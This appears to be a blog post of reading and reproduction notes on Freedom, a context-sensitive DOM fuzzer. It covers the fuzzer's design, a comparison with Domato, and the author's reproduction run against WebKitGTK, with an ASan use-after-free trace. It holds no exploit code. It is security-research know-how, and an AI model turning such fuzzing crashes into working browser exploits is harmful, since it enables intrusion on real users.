<link href="/2022/09/23/Freedom%E5%A4%8D%E7%8E%B0%E7%AC%94%E8%AE%B0/"/>
<url>/2022/09/23/Freedom%E5%A4%8D%E7%8E%B0%E7%AC%94%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="背景"><a href="#背景" class="headerlink" title="Background"></a>Background</h1><h2 id="DOM引擎漏洞"><a href="#DOM引擎漏洞" class="headerlink" title="DOM engine vulnerabilities"></a>DOM engine vulnerabilities</h2><p>The paper aims to find memory-safety bugs in DOM engines at runtime. Such bugs can corrupt data or even lead to RCE, and may form a complete exploit chain.</p><h2 id="介绍"><a href="#介绍" class="headerlink" title="Introduction"></a>Introduction</h2><p>Existing fuzzers</p><ul><li>domfuzz</li><li>Bf3</li><li>cross_fuzz</li><li>Dharma</li><li>Avalanche</li><li>Wadi</li><li>Domato</li></ul><p>Among them:</p><ul><li><p>Dynamic JS fuzzing (domfuzz, cross_fuzz)</p><p>These grab the elements available on the page at runtime and invoke random DOM API calls on them until the browser crashes. Dynamic fuzzers of this kind are rarely used today: the target browser instance ages after running for a long time, which leads to unstable execution and non-reproducible crashes.</p></li><li><p>Static generation fuzzing (Domato being the representative)</p><p>These generate syntactically correct documents from scratch according to static rules or a grammar describing the specification, and execute each document in a fresh browser instance for a bounded time. Because the rules and grammars these fuzzers use are not fully context-sensitive, the generated documents contain semantic errors.</p><p>Black-box testing: neither existing test cases nor feedback are used.</p></li></ul><h1 id="传统模糊缺陷"><a href="#传统模糊缺陷" class="headerlink" title="Shortcomings of traditional fuzzing"></a>Shortcomings of traditional fuzzing</h1><h2 id="静态语法无效性"><a href="#静态语法无效性" class="headerlink" title="Invalidity of static grammars"></a>Invalidity of static grammars</h2><p>Domato describes HTML documents with a context-free grammar. This largely guarantees syntactic correctness, but it cannot express every data dependency across the whole input.</p><ul><li><p>CSS selectors</p><p>Domato considers a fixed number of HTML and SVG elements, a fixed number of predefined class names, and all HTML and SVG tags. But in a randomly generated Domato document, the number of elements and the tags or class names available for reference are not known before generation. The result is dangling references, or valid elements that are never exercised.</p></li><li><p>CSS properties</p><ul><li><p>A property belongs to a JavaScript object, whereas an attribute belongs to an element of the HTML page. When the browser renders the page, each element gets a corresponding JavaScript object, and all of the element's attributes are loaded into that object's attributes property, an array-like collection.</p></li><li><p>The way SVG <clipPath> and SVG <filter> elements are generated does not follow the standard.</p></li></ul></li><li><p>Attribute name values</p><ul><li>Several past DOM bugs involved dynamically updating a particular attribute of an element. Because Domato does not know which attributes each existing element in the document has, it cannot produce such cases.</li><li>An SVG <animate> element uses its attributeName attribute to indicate which attribute of its parent element is animated. Not knowing which element an <animate> serves, Domato sets attributeName to any animatable SVG attribute at random. For example, Domato may emit a worthless <animate> that tries to change a non-existent x attribute of a <path> element.</li></ul></li><li><p>Attribute values</p><ul><li><p>As with CSS selectors and property values, the value of certain attributes (such as form and usemap) refers to an element of a specific type (<form> and <map> respectively), and Domato does not describe this correctly either.</p></li><li><p>An attribute value can also depend implicitly on other attribute values. For <animate>, the value of the from attribute is determined by the value of its sibling attribute attributeName. Without knowing the exact value attributeName was given, Domato's only option is to assign some generic value to from statelessly, which does not work in most cases.</p></li></ul></li></ul><h1 id="设计"><a href="#设计" class="headerlink" title="Design"></a>Design</h1><p>A distributed DOM fuzzer with two parts: black-box generation and coverage-guided mutation (only black-box generation is open source).</p><ul><li>Black-box generation<ul><li>HTML documents are generated randomly from FD-IR</li><li>The server only collects crash information</li></ul></li><li>Coverage-guided mutation<ul><li>The server collects and maintains the test-case queue and the global coverage map</li><li>Fuzzing instances fetch samples from the queue and mutate them or merge them with other documents</li><li>The DOM engine is built with coverage instrumentation</li></ul></li></ul><h2 id="上下文敏感的文档表示"><a href="#上下文敏感的文档表示" class="headerlink" title="Context-sensitive document representation"></a>Context-sensitive document representation</h2><p>Context is divided into two kinds:</p><ul><li>Global context: a tree structure records every element (including tags and attributes), and all usable tokens (class names, CSS counter names, CSS keyframe names, and so on) are recorded as well; the two are managed separately.</li><li>Local context: FD-IR describes a local context for each JavaScript function, used to generate semantically correct DOM API calls. Besides referencing the global context, a local context keeps, in a separate map, every local DOM object created by an API call. Unlike global elements, which any API call in the function may use, a local object is valid only after it has been defined. FD-IR therefore also knows the exact position (that is, the line) at which an object is defined, which supports the various API mutations.</li></ul><h3 id="Value"><a href="#Value" class="headerlink" title="Value"></a>Value</h3><p>Represents the various kinds of data that may appear in a document, such as CSS selectors, CSS properties, attributes, and the arguments and return values of API calls.</p><p>A Value definition contains three methods:</p><ul><li>generate: random generation (based on the global or local context)</li><li>mutate: random mutation</li><li>lower: converts the FD-IR Value into its string form in the document</li></ul><h4 id="具体例子"><a href="#具体例子" class="headerlink" title="Examples"></a>Examples</h4><p><img src="/image-20220904230408905.png" alt="Examples of IR types"></p><ul><li>CSSProperty: a compound Value; its contents are mutated selectively</li><li>CSSFilter: defined in terms of CSSFilterValue</li><li>CSSFilterValue: a basic Value (the majority of Values are of this kind); it contains no other Values, so mutation is simply regeneration</li><li>ReturnValue: a Value that the context refers to; its generate method introduces a new object into the local context, so it must not be mutated, otherwise subsequent API calls break</li></ul><h4 id="分类"><a href="#分类" class="headerlink" title="Categories"></a>Categories</h4><ul><li>DOM tree: a multi-way tree whose only root is <body> and whose nodes are DOM elements. For each element node FD-IR records the element type, a unique id, the child nodes and an attribute list, where each attribute is a Value instance.</li><li>CSS rules: FD-IR keeps a list of CSS rules; for each rule, the selector list and the CSS property list it maintains are Value instances.</li><li>Event handlers: FD-IR keeps a list of event handlers. The onload handler of the body element is the main event handler; the total number of other handlers in the document is predefined and does not grow during mutation. Each event handler contains a sequence of DOM API calls.</li></ul><h3 id="上下文敏感"><a href="#上下文敏感" class="headerlink" title="Context sensitivity"></a>Context sensitivity</h3><h4 id="文档生成"><a href="#文档生成" class="headerlink" title="Document generation"></a>Document generation</h4><p>Generation starts from a blank document containing only a <body> element, an empty main event handler and an empty list of event handlers. FD-IR then builds the document content in the order DOM tree, CSS rules, event handlers, which involves a large number of context queries and updates.</p><ul><li>DOM tree generation (first)</li></ul><h1 id="分析"><a href="#分析" class="headerlink" title="Evaluation"></a>Evaluation</h1><p>Environment:</p><ul><li>5 servers with 24 cores each</li><li>Ubuntu 18.04 with AMD Ryzen 9 3900X</li><li>64GB memory</li><li>X virtual frame buffer (Xvfb)</li></ul><p>Methodology:</p><ul><li>Scale: 100 instances per fuzzer, running for 24 hours</li><li>Target: ASan build of WebKitGTK 2.28.0</li><li>Coverage: the documents are re-run on an instrumented WebKit build to obtain DOM engine code coverage</li></ul><h2 id="FD-G-和以往fuzzer对比"><a href="#FD-G-和以往fuzzer对比" class="headerlink" title="FD(G) versus earlier fuzzers"></a>FD(G) versus earlier fuzzers</h2><h3 id="Dharma"><a href="#Dharma" class="headerlink" title="Dharma"></a>Dharma</h3><p><img src="/image-20220828152635314.png" alt="Dharma results"></p><h3 id="Domato"><a href="#Domato" class="headerlink" title="Domato"></a>Domato</h3><p><img src="/image-20220828153118312.png" alt="Domato results"></p><h2 id="FD-G-对比FD-M"><a href="#FD-G-对比FD-M" class="headerlink" title="FD(G) versus FD(M)"></a>FD(G) versus FD(M)</h2><p>FD(M) finds some crashes that FD(G) does not, but it misses many more.</p><p>The mutations with which FD(M) tries to expand code coverage have no particular direction, so they fail to trigger the corresponding bugs. Although the documents FD(G) generates blindly will never exhaustively explore the browser's code, FD(G) at least keeps exercising some deep code paths on every execution, because the generated documents are large and semantically rich. By contrast, coverage guidance makes FD(M), which starts from a blank document, wander among many shallow code paths, and because of the extreme complexity of the DOM engine it cannot move deeper for a long time.</p><p>Overall, black-box generation is not exhaustive, but it is still recommended for finding a large number of DOM engine bugs within reasonable time. Coverage-driven mutation is nevertheless regarded as irreplaceable, especially for bugs that occur only under strict conditions. Another advantage of mutation-based fuzzing is that minimised crash files are much smaller and minimisation takes less time. The authors also believe that with more computing resources and better seed inputs its performance could improve substantially.</p><p><img src="/image-20220828153826150.png" alt="Freedom results"></p><h1 id="DOM-x2F-JS-FUZZ领域issue"><a href="#DOM-x2F-JS-FUZZ领域issue" class="headerlink" title="Open issues in DOM/JS fuzzing"></a>Open issues in DOM/JS fuzzing</h1><ul><li>How to generate semantically correct test cases (Freedom, SoFi, Favocado)<ul><li>Freedom: an intermediate representation (IR); generation under constraints</li><li>SoFi: JavaScript dynamic reflection; semantic errors are repaired dynamically</li><li>Favocado: collects semantic information and groups it into classes; parses the Interface Definition Language (IDL)</li></ul></li><li>How to efficiently discover deep relationships between APIs (Montage)<ul><li>Montage: calls APIs and observes whether they interact through memory</li></ul></li></ul><h1 id="Freedom复现"><a href="#Freedom复现" class="headerlink" title="Reproducing Freedom"></a>Reproducing Freedom</h1><h2 id="运行环境"><a href="#运行环境" class="headerlink" title="Environment"></a>Environment</h2><ul><li>xvfb-run is used to run the browser without a display</li></ul><h2 id="crash检测脚本"><a href="#crash检测脚本" class="headerlink" title="Crash detection script"></a>Crash detection script</h2><ol><li><p>Run FD(G) to generate documents</p></li><li><p>Post-process the generated files, adding a JS statement that exits automatically</p></li><li><p>Check the result of executing each file</p><ul><li><p>Exit status 1 means the file was executed to the end with no crash</p></li><li><p>A timeout means the file crashed during execution; process it further</p></li><li><p>Filter out ASan CHECK failures among the crashes:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">==4594==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_poisoning.cc:37 <br></code></pre></td></tr></table></figure><p>A CHECK failure here means the code detected an error during a check and aborted directly.</p><p>Since the same checks also exist in release builds of WebKit, reports of this kind cannot be used against release builds.</p></li></ul></li><li><p>Save the valid results</p><p>Two processes running for one day produced 5 valid crash samples in total:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">uaf</span>:<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166375168412</span>.html<br><span class="hljs-attribute">crashes</span>/<span 
class="hljs-number">1</span>-<span class="hljs-number">166378535004</span>.html<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166379051542</span>.html<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166379150950</span>.html<br><span class="hljs-attribute">SIGV</span>:<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166377133300</span>.html<br></code></pre></td></tr></table></figure></li></ol><h2 id="样本分析"><a href="#样本分析" class="headerlink" title="Sample analysis"></a>Sample analysis</h2><p>I cannot make sense of this yet; it needs to be analysed together with the source code.</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">xvfb-run -a ../webkitgtk-2.28.0/bin/MiniBrowser $FUZZDIR/$i<br></code></pre></td></tr></table></figure><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span 
class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span 
class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br></pre></td><td class="code"><pre><code class="hljs dns">WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory will be disabled.</span><br>WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory 
will be disabled.</span><br>WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory will be disabled.</span><br>=================================================================<br>==<span class="hljs-number">12747</span>==ERROR: AddressSanitizer: heap-use-after-free on address <span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> at pc <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b28</span> bp <span class="hljs-number">0</span>x7ffc5fa5d6a0 sp <span class="hljs-number">0</span>x7ffc5fa5d690<br>READ of size <span class="hljs-number">4</span> at <span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> thread T0<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span 
class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>tableSizeMask() const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">585</span><br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >* WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>inlineLookup<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span 
class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">675</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >* WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span 
class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>lookup<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">661</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTableConstIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span 
class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, 
WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1084</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span 
class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">476</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span 
